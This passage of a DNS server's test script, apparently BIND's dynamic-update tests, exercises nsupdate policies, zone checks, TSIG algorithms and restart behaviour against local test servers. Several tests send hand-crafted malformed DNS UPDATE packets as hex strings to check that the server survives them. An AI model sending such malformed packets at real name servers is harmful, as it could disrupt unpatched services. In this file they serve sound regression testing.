+ret=0 +echo_i "fetching second copy of zone before update" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "comparing pre-update copies to known good data" +digcomp knowngood.ns1.before dig.out.ns1 || ret=1 +digcomp knowngood.ns1.before dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure an unrelated zone is mentioned in its NOTAUTH log" +$NSUPDATE -k ns1/ddns.key > nsupdate.out 2>&1 << END && ret=1 +server 10.53.0.1 ${PORT} +zone unconfigured.test +update add unconfigured.test 600 IN A 10.53.0.1 +send +END +grep NOTAUTH nsupdate.out > /dev/null 2>&1 || ret=1 +grep ' unconfigured.test: not authoritative' ns1/named.run \ + > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure a subdomain is mentioned in its NOTAUTH log" +$NSUPDATE -k ns1/ddns.key > nsupdate.out 2>&1 << END && ret=1 +server 10.53.0.1 ${PORT} +zone sub.sub.example.nil +update add sub.sub.sub.example.nil 600 IN A 10.53.0.1 +send +END +grep NOTAUTH nsupdate.out > /dev/null 2>&1 || ret=1 +grep ' sub.sub.example.nil: not authoritative' ns1/named.run \ + > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "updating zone" +# nsupdate will print a ">" prompt to stdout as it gets each input line. +$NSUPDATE -k ns1/ddns.key <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add updated.example.nil. 600 A 10.10.10.1 +add updated.example.nil. 600 TXT Foo +delete t.example.nil. + +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "sleeping 5 seconds for server to incorporate changes" +sleep 5 + +ret=0 +echo_i "fetching first copy of zone after update" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "fetching second copy of zone after update" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "comparing post-update copies to known good data" +digcomp knowngood.ns1.after dig.out.ns1 || ret=1 +digcomp knowngood.ns1.after dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "testing local update policy" +pre=$($DIG $DIGOPTS +short new.other.nil. @10.53.0.1 a) || ret=1 +[ -z "$pre" ] || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "updating zone" +# nsupdate will print a ">" prompt to stdout as it gets each input line. +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > /dev/null <<END || ret=1 +zone other.nil. +update add new.other.nil. 600 IN A 10.10.10.1 +send +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "sleeping 5 seconds for server to incorporate changes" +sleep 5 + +ret=0 +echo_i "checking result of update" +post=$($DIG $DIGOPTS +short new.other.nil. @10.53.0.1 a) || ret=1 +[ "$post" = "10.10.10.1" ] || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "comparing post-update copy to known good data" +digcomp knowngood.ns1.after dig.out.ns1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "testing zone consistency checks" +# inserting an NS record without a corresponding A or AAAA record should fail +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END && ret=1 +update add other.nil. 600 in ns ns3.other.nil. +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 || ret=1 +# ...but should work if an A record is inserted first: +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END || ret=1 +update add ns4.other.nil 600 in a 10.53.0.1 +send +update add other.nil. 600 in ns ns4.other.nil. +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +# ...or if an AAAA record does: +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END || ret=1 +update add ns5.other.nil 600 in aaaa 2001:db8::1 +send +update add other.nil. 600 in ns ns5.other.nil. +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +# ...or if the NS and A/AAAA are inserted together: +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END || ret=1 +update add other.nil. 600 in ns ns6.other.nil. +update add ns6.other.nil 600 in a 10.53.0.1 +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "sleeping 5 seconds for server to incorporate changes" +sleep 5 + +ret=0 +echo_i "checking result of update" +$DIG $DIGOPTS +short @10.53.0.1 ns other.nil > dig.out.ns1 || ret=1 +grep ns3.other.nil dig.out.ns1 > /dev/null 2>&1 && ret=1 +grep ns4.other.nil dig.out.ns1 > /dev/null 2>&1 || ret=1 +grep ns5.other.nil dig.out.ns1 > /dev/null 2>&1 || ret=1 +grep ns6.other.nil dig.out.ns1 > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure 'check-mx ignore' allows adding MX records containing an address without a warning" +$NSUPDATE -k ns1/ddns.key > nsupdate.out 2>&1 << END || ret=1 +server 10.53.0.1 ${PORT} +update add mx03.example.nil 600 IN MX 10 10.53.0.1 +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +grep "mx03.example.nil/MX:.*MX is an address" ns1/named.run > /dev/null 2>&1 && ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure 'check-mx warn' allows adding MX records containing an address with a warning" +$NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > nsupdate.out 2>&1 << END || ret=1 +update add mx03.other.nil 600 IN MX 10 10.53.0.1 +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 && ret=1 +grep "mx03.other.nil/MX:.*MX is an address" ns1/named.run > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "ensure 'check-mx fail' prevents adding MX records containing an address with a warning" +$NSUPDATE > nsupdate.out 2>&1 << END && ret=1 +server 10.53.0.1 ${PORT} +update add mx03.update.nil 600 IN MX 10 10.53.0.1 +send +END +grep REFUSED nsupdate.out > /dev/null 2>&1 || ret=1 +grep "mx03.update.nil/MX:.*MX is an address" ns1/named.run > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "check SIG(0) key is accepted" +key=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -T KEY -n ENTITY xxx) +echo "" | $NSUPDATE -k ${key}.private > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check TYPE=0 update is rejected by nsupdate ($n)" +$NSUPDATE <<END > nsupdate.out 2>&1 && ret=1 + server 10.53.0.1 ${PORT} + ttl 300 + update add example.nil. in type0 "" + send +END +grep "unknown class/type" nsupdate.out > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check TYPE=0 prerequisite is handled ($n)" +$NSUPDATE -k ns1/ddns.key <<END > nsupdate.out 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + prereq nxrrset example.nil. type0 + send +END +$DIG $DIGOPTS +tcp version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" dig.out.ns1.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that TYPE=0 update is handled ($n)" +echo "a0e4280000010000000100000000060001c00c000000fe000000000000" | +$PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t tcp > /dev/null || ret=1 +$DIG $DIGOPTS +tcp version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" dig.out.ns1.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that TYPE=0 additional data is handled ($n)" +echo "a0e4280000010000000000010000060001c00c000000fe000000000000" | +$PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t tcp > /dev/null || ret=1 +$DIG $DIGOPTS +tcp version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" dig.out.ns1.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that update to undefined class is handled ($n)" +echo "a0e4280000010001000000000000060101c00c000000fe000000000000" | +$PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t tcp > /dev/null || ret=1 +$DIG $DIGOPTS +tcp version.bind txt ch @10.53.0.1 > dig.out.ns1.$n +grep "status: NOERROR" dig.out.ns1.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that address family mismatch is handled ($n)" +$NSUPDATE <<END > /dev/null 2>&1 && ret=1 +server ::1 +local 127.0.0.1 +update add 600 txt.example.nil in txt "test" +send +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + + +n=$((n + 1)) +ret=0 +echo_i "check that unixtime serial number is correctly generated ($n)" +$DIG $DIGOPTS +short unixtime.nil. soa @10.53.0.1 > dig.out.old.test$n || ret=1 +oldserial=$(awk '{print $3}' dig.out.old.test$n) || ret=1 +start=$($PERL -e 'print time()."\n";') +$NSUPDATE <<END > /dev/null 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + ttl 600 + update add new.unixtime.nil in a 1.2.3.4 + send +END +now=$($PERL -e 'print time()."\n";') +sleep 1 +$DIG $DIGOPTS +short unixtime.nil. soa @10.53.0.1 > dig.out.new.test$n || ret=1 +serial=$(awk '{print $3}' dig.out.new.test$n) || ret=1 +[ "$oldserial" = "$serial" ] && { echo_i "oldserial == serial"; ret=1; } +if [ "$serial" -lt "$start" ]; then + echo_i "out-of-range serial=$serial < start=$start"; ret=1; +elif [ "$serial" -gt "$now" ]; then + echo_i "out-of-range serial=$serial > now=$now"; ret=1; +fi +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + n=$((n + 1)) + ret=0 + echo_i "running update.pl test ($n)" + $PERL update_test.pl -s 10.53.0.1 -p ${PORT} update.nil. > perl.update_test.out || ret=1 + [ $ret -eq 1 ] && { echo_i "failed"; status=1; } + + if $PERL -e 'use Net::DNS; die "Net::DNS too old ($Net::DNS::VERSION < 1.01)" if ($Net::DNS::VERSION < 1.01)' > /dev/null + then + n=$((n + 1)) + ret=0 + echo_i "check for too many NSEC3 iterations log ($n)" + grep "updating zone 'update.nil/IN': too many NSEC3 iterations (151)" ns1/named.run > /dev/null || ret=1 + [ $ret -eq 1 ] && { echo_i "failed"; status=1; } + fi +else + echo_i "The second part of this test requires the Net::DNS library." >&2 +fi + +n=$((n + 1)) +ret=0 +echo_i "fetching first copy of test zone ($n)" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "fetching second copy of test zone ($n)" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "comparing zones ($n)" +digcomp dig.out.ns1 dig.out.ns2 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "SIGKILL and restart server ns1" +cd ns1 +$KILL -KILL $(cat named.pid) +rm named.pid +cd .. +sleep 10 +if + start_server --noclean --restart --port ${PORT} ns1 +then + echo_i "restarted server ns1" +else + echo_i "could not restart server ns1" + exit 1 +fi +sleep 10 + +n=$((n + 1)) +ret=0 +echo_i "fetching ns1 after hard restart ($n)" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.1 axfr > dig.out.ns1.after || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "comparing zones ($n)" +digcomp dig.out.ns1 dig.out.ns1.after || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "begin RT #482 regression test" + +n=$((n + 1)) +ret=0 +echo_i "update primary ($n)" +$NSUPDATE -k ns1/ddns.key <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add updated2.example.nil. 600 A 10.10.10.2 +update add updated2.example.nil. 600 TXT Bar +update delete c.example.nil. +send +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +sleep 5 + +if [ ! "$CYGWIN" ]; then + echo_i "SIGHUP secondary" + $KILL -HUP $(cat ns2/named.pid) +else + echo_i "reload secondary" + rndc_reload ns2 10.53.0.2 +fi + +sleep 5 + +n=$((n + 1)) +ret=0 +echo_i "update primary again ($n)" +$NSUPDATE -k ns1/ddns.key <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add updated3.example.nil. 600 A 10.10.10.3 +update add updated3.example.nil. 600 TXT Zap +del d.example.nil. +send +END +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +sleep 5 + +if [ ! "$CYGWIN" ]; then + echo_i "SIGHUP secondary again" + $KILL -HUP $(cat ns2/named.pid) +else + echo_i "reload secondary again" + rndc_reload ns2 10.53.0.2 +fi + +sleep 5 + +n=$((n + 1)) +echo_i "check to 'out of sync' message ($n)" +if grep "out of sync" ns2/named.run +then + echo_i "failed (found 'out of sync')" + status=1 +fi + +echo_i "end RT #482 regression test" + +n=$((n + 1)) +ret=0 +echo_i "start NSEC3PARAM changes via UPDATE on a unsigned zone test ($n)" +$NSUPDATE << EOF +server 10.53.0.3 ${PORT} +update add example 3600 nsec3param 1 0 0 - +send +EOF + +# the zone is not signed. The nsec3param records should be removed. +# this also proves that the server is still running. +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocmd +norec example.\ + @10.53.0.3 nsec3param > dig.out.ns3.$n || ret=1 +grep "ANSWER: 0," dig.out.ns3.$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns3.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "change the NSEC3PARAM ttl via update ($n)" +$NSUPDATE << EOF +server 10.53.0.3 ${PORT} +update add nsec3param.test 3600 NSEC3PARAM 1 0 1 - +send +EOF + +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocmd +norec nsec3param.test.\ + @10.53.0.3 nsec3param > dig.out.ns3.$n || ret=1 +grep "ANSWER: 1," dig.out.ns3.$n > /dev/null || ret=1 +grep "3600.*NSEC3PARAM" dig.out.ns3.$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns3.$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "add a new NSEC3PARAM via update ($n)" +$NSUPDATE << EOF +server 10.53.0.3 ${PORT} +update add nsec3param.test 3600 NSEC3PARAM 1 0 4 - +send +EOF + +_ret=1 +for i in 0 1 2 3 4 5 6 7 8 9; do + $DIG $DIGOPTS +tcp +norec +time=1 +tries=1 @10.53.0.3 nsec3param.test. NSEC3PARAM > dig.out.ns3.$n || _ret=1 + if grep "ANSWER: 2," dig.out.ns3.$n > /dev/null; then + _ret=0 + break + fi + sleep 1 +done + +if [ $_ret -ne 0 ]; then ret=1; fi +grep "NSEC3PARAM 1 0 4 -" dig.out.ns3.$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=$((ret + status)); fi + +n=$((n + 1)) +ret=0 +echo_i "add, delete and change the ttl of the NSEC3PARAM rrset via update ($n)" +$NSUPDATE << EOF +server 10.53.0.3 ${PORT} +update delete nsec3param.test NSEC3PARAM +update add nsec3param.test 7200 NSEC3PARAM 1 0 5 - +send +EOF + +_ret=1 +for i in 0 1 2 3 4 5 6 7 8 9; do + $DIG $DIGOPTS +tcp +norec +time=1 +tries=1 @10.53.0.3 nsec3param.test. NSEC3PARAM > dig.out.ns3.$n || _ret=1 + if grep "ANSWER: 1," dig.out.ns3.$n > /dev/null; then + _ret=0 + break + fi + sleep 1 +done + +if [ $_ret -ne 0 ]; then ret=1; fi +grep "7200.*NSEC3PARAM 1 0 5 -" dig.out.ns3.$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns3.$n > /dev/null || ret=1 +$JOURNALPRINT ns3/nsec3param.test.db.signed.jnl > jp.out.ns3.$n +# intermediate TTL changes. +grep "add nsec3param.test. 7200 IN NSEC3PARAM 1 0 4 -" jp.out.ns3.$n > /dev/null || ret=1 +grep "add nsec3param.test. 7200 IN NSEC3PARAM 1 0 1 -" jp.out.ns3.$n > /dev/null || ret=1 +# delayed adds and deletes. +grep "add nsec3param.test. 0 IN TYPE65534 .# 6 000180000500" jp.out.ns3.$n > /dev/null || ret=1 +grep "add nsec3param.test. 0 IN TYPE65534 .# 6 000140000100" jp.out.ns3.$n > /dev/null || ret=1 +grep "add nsec3param.test. 0 IN TYPE65534 .# 6 000140000400" jp.out.ns3.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=$((ret + status)); fi + + +ret=0 +echo_i "testing that rndc stop updates the file" +$NSUPDATE -k ns1/ddns.key <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add updated4.example.nil. 600 A 10.10.10.3 +send +END +sleep 3 +stop_server --use-rndc --port ${CONTROLPORT} ns1 +sleep 3 +# Removing the journal file and restarting the server means +# that the data served by the new server process are exactly +# those dumped to the file by "rndc stop". +rm -f ns1/*jnl +start_server --noclean --restart --port ${PORT} ns1 +for try in 0 1 2 3 4 5 6 7 8 9; do + iret=0 + $DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + updated4.example.nil. @10.53.0.1 a > dig.out.ns1 || iret=1 + digcomp knowngood.ns1.afterstop dig.out.ns1 || iret=1 + [ "$iret" -eq 0 ] && break + sleep 1 +done +[ "$iret" -ne 0 ] && ret=1 +[ "$ret" -eq 0 ] || { echo_i "failed"; status=1; } + +ret=0 +echo_i "check that 'nsupdate -l' with a missing keyfile reports the missing file" +$NSUPDATE -4 -p ${PORT} -l -k ns1/nonexistent.key 2> nsupdate.out < /dev/null +grep ns1/nonexistent.key nsupdate.out > /dev/null || ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy local' works from localhost address ($n)" +$NSUPDATE -k ns5/session.key > nsupdate.out.$n 2>&1 << END || ret=1 +server 10.53.0.5 ${PORT} +local 127.0.0.1 +update add fromlocal.local.nil. 600 A 1.2.3.4 +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 && ret=1 +$DIG $DIGOPTS @10.53.0.5 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + fromlocal.local.nil. > dig.out.ns5.$n || ret=1 +grep fromlocal dig.out.ns5.$n > /dev/null 2>&1 || ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy local' fails from non-localhost address ($n)" +grep 'match on session key not from localhost' ns5/named.run > /dev/null && ret=1 +$NSUPDATE -k ns5/session.key > nsupdate.out.$n 2>&1 << END && ret=1 +server 10.53.0.5 ${PORT} +local 10.53.0.1 +update add nonlocal.local.nil. 600 A 4.3.2.1 +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 || ret=1 +grep 'match on session key not from localhost' ns5/named.run > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.5 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + nonlocal.local.nil. > dig.out.ns5.$n || ret=1 +grep nonlocal dig.out.ns5.$n > /dev/null 2>&1 && ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy tcp-self' refuses update of records via UDP ($n)" +$NSUPDATE > nsupdate.out.$n 2>&1 << END +server 10.53.0.6 ${PORT} +local 127.0.0.1 +update add 1.0.0.127.in-addr.arpa. 600 PTR localhost. +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 || ret=1 +$DIG $DIGOPTS @10.53.0.6 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + -x 127.0.0.1 > dig.out.ns6.$n +grep localhost. dig.out.ns6.$n > /dev/null 2>&1 && ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy tcp-self' permits update of records for the client's own address via TCP ($n)" +$NSUPDATE -v > nsupdate.out.$n 2>&1 << END || ret=1 +server 10.53.0.6 ${PORT} +local 127.0.0.1 +update add 1.0.0.127.in-addr.arpa. 600 PTR localhost. +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 && ret=1 +$DIG $DIGOPTS @10.53.0.6 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + -x 127.0.0.1 > dig.out.ns6.$n || ret=1 +grep localhost. dig.out.ns6.$n > /dev/null 2>&1 || ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy tcp-self' refuses update of records for a different address from the client's own address via TCP ($n)" +$NSUPDATE -v > nsupdate.out.$n 2>&1 << END +server 10.53.0.6 ${PORT} +local 127.0.0.1 +update add 1.0.168.192.in-addr.arpa. 600 PTR localhost. +send +END +grep REFUSED nsupdate.out.$n > /dev/null 2>&1 || ret=1 +$DIG $DIGOPTS @10.53.0.6 \ + +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd \ + -x 192.168.0.1 > dig.out.ns6.$n +grep localhost. dig.out.ns6.$n > /dev/null 2>&1 && ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy subdomain' is properly enforced ($n)" +# "restricted.example.nil" matches "grant ... subdomain restricted.example.nil" +# and thus this UPDATE should succeed. +$NSUPDATE -d <<END > nsupdate.out1-$n 2>&1 || ret=1 +server 10.53.0.1 ${PORT} +key restricted.example.nil 1234abcd8765 +update add restricted.example.nil 0 IN TXT everywhere. +send +END +$DIG $DIGOPTS +tcp @10.53.0.1 restricted.example.nil TXT > dig.out.1.test$n || ret=1 +grep "TXT.*everywhere" dig.out.1.test$n > /dev/null || ret=1 +# "example.nil" does not match "grant ... subdomain restricted.example.nil" and +# thus this UPDATE should fail. +$NSUPDATE -d <<END > nsupdate.out2-$n 2>&1 && ret=1 +server 10.53.0.1 ${PORT} +key restricted.example.nil 1234abcd8765 +update add example.nil 0 IN TXT everywhere. +send +END +$DIG $DIGOPTS +tcp @10.53.0.1 example.nil TXT > dig.out.2.test$n || ret=1 +grep "TXT.*everywhere" dig.out.2.test$n > /dev/null && ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that 'update-policy zonesub' is properly enforced ($n)" +# grant zonesub-key.example.nil zonesub TXT; +# the A record update should be rejected as it is not in the type list +$NSUPDATE -d <<END > nsupdate.out1-$n 2>&1 && ret=1 +server 10.53.0.1 ${PORT} +key zonesub-key.example.nil 1234subk8765 +update add zonesub.example.nil 0 IN A 1.2.3.4 +send +END +$DIG $DIGOPTS +tcp @10.53.0.1 zonesub.example.nil A > dig.out.1.test$n || ret=1 +grep "status: REFUSED" nsupdate.out1-$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.1.test$n > /dev/null || ret=1 +# the TXT record update should be accepted as it is in the type list +$NSUPDATE -d <<END > nsupdate.out2-$n 2>&1 || ret=1 +server 10.53.0.1 ${PORT} +key zonesub-key.example.nil 1234subk8765 +update add zonesub.example.nil 0 IN TXT everywhere. +send +END +$DIG $DIGOPTS +tcp @10.53.0.1 zonesub.example.nil TXT > dig.out.2.test$n || ret=1 +grep "status: REFUSED" nsupdate.out2-$n > /dev/null && ret=1 +grep "ANSWER: 1," dig.out.2.test$n > /dev/null || ret=1 +grep "TXT.*everywhere" dig.out.2.test$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check 'grant' in deny name + grant subdomain ($n)" +$NSUPDATE << EOF > nsupdate.out-$n 2>&1 || ret=1 +key hmac-sha256:subkey 1234abcd8765 +server 10.53.0.9 ${PORT} +zone denyname.example +update add foo.denyname.example 3600 IN TXT added +send +EOF +$DIG $DIGOPTS +tcp @10.53.0.9 foo.denyname.example TXT > dig.out.ns9.test$n +grep "added" dig.out.ns9.test$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check 'deny' in deny name + grant subdomain ($n)" +$NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 +key hmac-sha256:subkey 1234abcd8765 +server 10.53.0.9 ${PORT} +zone denyname.example +update add denyname.example 3600 IN TXT added +send +EOF +$DIG $DIGOPTS +tcp @10.53.0.9 denyname.example TXT > dig.out.ns9.test$n +grep "added" dig.out.ns9.test$n > /dev/null && ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that changes to the DNSKEY RRset TTL do not have side effects ($n)" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd dnskey.test. \ + @10.53.0.3 dnskey | \ + awk -v port="${PORT}" 'BEGIN { print "server 10.53.0.3", port; } + $2 == 10 && $3 == "IN" && $4 == "DNSKEY" { $2 = 600; print "update add", $0 } + END { print "send" }' > update.in.$n +$NSUPDATE update.in.$n + +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd dnskey.test. \ + @10.53.0.3 any > dig.out.ns3.$n + +grep "600.*DNSKEY" dig.out.ns3.$n > /dev/null || ret=1 +grep TYPE65534 dig.out.ns3.$n > /dev/null && ret=1 +if test $ret -ne 0 +then +echo_i "failed"; status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check notify with TSIG worked ($n)" +# if the alternate view received a notify--meaning, the notify was +# validly signed by "altkey"--then the zonefile update.alt.bk will +# will have been created. +[ -f ns2/update.alt.bk ] || ret=1 +if [ $ret -ne 0 ]; then + echo_i "failed" + status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check type list options ($n)" +$NSUPDATE -T > typelist.out.T.${n} || { ret=1; echo_i "nsupdate -T failed"; } +$NSUPDATE -P > typelist.out.P.${n} || { ret=1; echo_i "nsupdate -P failed"; } +$NSUPDATE -TP > typelist.out.TP.${n} || { ret=1; echo_i "nsupdate -TP failed"; } +grep ANY typelist.out.T.${n} > /dev/null && { ret=1; echo_i "failed: ANY found (-T)"; } +grep ANY typelist.out.P.${n} > /dev/null && { ret=1; echo_i "failed: ANY found (-P)"; } +grep ANY typelist.out.TP.${n} > /dev/null && { ret=1; echo_i "failed: ANY found (-TP)"; } +grep KEYDATA typelist.out.T.${n} > /dev/null && { ret=1; echo_i "failed: KEYDATA found (-T)"; } +grep KEYDATA typelist.out.P.${n} > /dev/null && { ret=1; echo_i "failed: KEYDATA found (-P)"; } +grep KEYDATA typelist.out.TP.${n} > /dev/null && { ret=1; echo_i "failed: KEYDATA found (-TP)"; } +grep AAAA typelist.out.T.${n} > /dev/null || { ret=1; echo_i "failed: AAAA not found (-T)"; } +grep AAAA typelist.out.P.${n} > /dev/null && { ret=1; echo_i "failed: AAAA found (-P)"; } +grep AAAA typelist.out.TP.${n} > /dev/null || { ret=1; echo_i "failed: AAAA not found (-TP)"; } +if [ $ret -ne 0 ]; then + echo_i "failed" + status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check command list ($n)" +( +while read cmd +do + echo "$cmd" | $NSUPDATE > /dev/null 2>&1 + if test $? -gt 1 ; then + echo_i "failed ($cmd)" + ret=1 + fi + echo "$cmd " | $NSUPDATE > /dev/null 2>&1 + if test $? -gt 1 ; then + echo_i "failed ($cmd)" + ret=1 + fi +done +exit $ret +) < commandlist || ret=1 +if [ $ret -ne 0 ]; then + status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check TSIG key algorithms (nsupdate -k) ($n)" +if $FEATURETEST --md5 +then + ALGS="md5 sha1 sha224 sha256 sha384 sha512" +else + ALGS="sha1 sha224 sha256 sha384 sha512" + echo_i "skipping disabled md5 algorithm" +fi +for alg in $ALGS; do + $NSUPDATE -k ns1/${alg}.key <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add ${alg}.keytests.nil. 600 A 10.10.10.3 +send +END +done +sleep 2 +for alg in $ALGS; do + $DIG $DIGOPTS +short @10.53.0.1 